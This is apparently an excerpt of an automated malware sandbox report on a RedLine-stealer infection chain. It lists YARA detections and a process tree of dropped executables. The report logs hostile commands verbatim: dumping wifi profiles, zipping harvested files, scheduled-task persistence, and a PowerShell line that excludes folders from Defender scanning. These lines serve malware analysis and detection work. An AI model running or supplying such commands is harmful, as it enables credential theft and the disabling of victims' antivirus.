Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004064F0	29_2_004064F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00403740	29_2_00403740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00401740	29_2_00401740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00405700	29_2_00405700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004379E0	29_2_004379E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00406BF0	29_2_00406BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00420BFA	29_2_00420BFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00437D70	29_2_00437D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0041DDB7	29_2_0041DDB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00423F4D	29_2_00423F4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00407FE0	29_2_00407FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_00423FF3	29_2_00423FF3

Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe

Process token adjusted: Security

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00408C90 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00409160 appears 162 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00408A40 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004092E0 appears 160 times
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: String function: 001AE080 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: String function: 001A8580 appears 137 times
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Code function: String function: 001ADA42 appears 83 times

Source: C:\Windows\System32\conhost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5564 -ip 5564

Source: alexxxxxxxx[1].exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: alexxxxxxxx.exe.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: bUWKfj04aU.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.alexxxxxxxx.exe.3c762de.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 10.2.alexxxxxxxx.exe.3c762de.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 10.2.alexxxxxxxx.exe.3b8e946.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.alexxxxxxxx.exe.3b05570.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 10.2.alexxxxxxxx.exe.3b05570.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.2271671273.0000000003B73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12

Source: alexxxxxxxx[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: alexxxxxxxx.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gold[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gold.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiiii[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: swiiiii.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: bUWKfj04aU.exe	Static PE information: Section: ZLIB complexity 0.9975034435261708
Source: bUWKfj04aU.exe	Static PE information: Section: icxmwjzd ZLIB complexity 0.9942756751306084
Source: explorgu.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9975034435261708
Source: explorgu.exe.0.dr	Static PE information: Section: icxmwjzd ZLIB complexity 0.9942756751306084

Source: classification engine

Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@170/306@0/30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 21_2_0042A936 CoCreateInstance,

21_2_0042A936

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

File created: C:\Users\user\AppData\Roaming\006700e5a2ab05

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7684
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:992:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5564
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

File created: C:\Users\user\AppData\Local\Temp\00c07260dc

Jump to behavior

Source: Yara match	File source: 00000023.00000003.3016446842.0000000005841000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u5ps.1.exe, type: DROPPED

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main

Source: bUWKfj04aU.exe	ReversingLabs: Detection: 63%
Source: bUWKfj04aU.exe	Virustotal: Detection: 65%

Source: bUWKfj04aU.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

File read: C:\Users\user\Desktop\bUWKfj04aU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\bUWKfj04aU.exe "C:\Users\user\Desktop\bUWKfj04aU.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe "C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\propro.exe "C:\Users\user\AppData\Roaming\configurationValue\propro.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe "C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe"
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe "C:\Users\user\AppData\Local\Temp\1001053001\gold.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe "C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe"
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5564 -ip 5564
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 920
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe "C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe"
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe "C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001084001\random.exe "C:\Users\user\AppData\Local\Temp\1001084001\random.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe "C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe"
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe "C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe "C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe"
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe "C:\Users\user\AppData\Local\Temp\1001107001\jok.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 500 -p 7684 -ip 7684
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7684 -s 1076
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe "C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe "C:\Users\user\AppData\Local\Temp\1001053001\gold.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe "C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001084001\random.exe "C:\Users\user\AppData\Local\Temp\1001084001\random.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe "C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe "C:\Users\user\AppData\Local\Temp\1001107001\jok.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\propro.exe "C:\Users\user\AppData\Roaming\configurationValue\propro.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe "C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe"
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe "C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe "C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe "C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe"
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process created: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe "C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe"
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process created: unknown unknown
